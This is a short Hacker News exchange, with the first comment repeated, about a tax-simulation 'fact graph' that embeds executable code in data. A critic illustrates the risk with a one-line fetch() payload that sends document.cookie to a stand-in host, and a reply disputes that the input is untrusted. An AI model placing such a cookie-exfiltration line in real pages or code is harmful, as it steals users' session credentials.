alt Hacker NewsThis is an interesting, but objectively terrible idea. You’ve now introduced arbitrary code execution into something that should be data.
Now let me send you a fact graph that contains:
fetch(`https://callhome.com/collect?s=${document.cookie}`)This is an interesting, but objectively terrible idea. You’ve now introduced arbitrary code execution into something that should be data.
Now let me send you a fact graph that contains:
fetch(`https://callhome.com/collect?s=${document.cookie}`)
The "data" is part of the tax simulation source code, not untrusted input, so such an attack vector doesn't exist.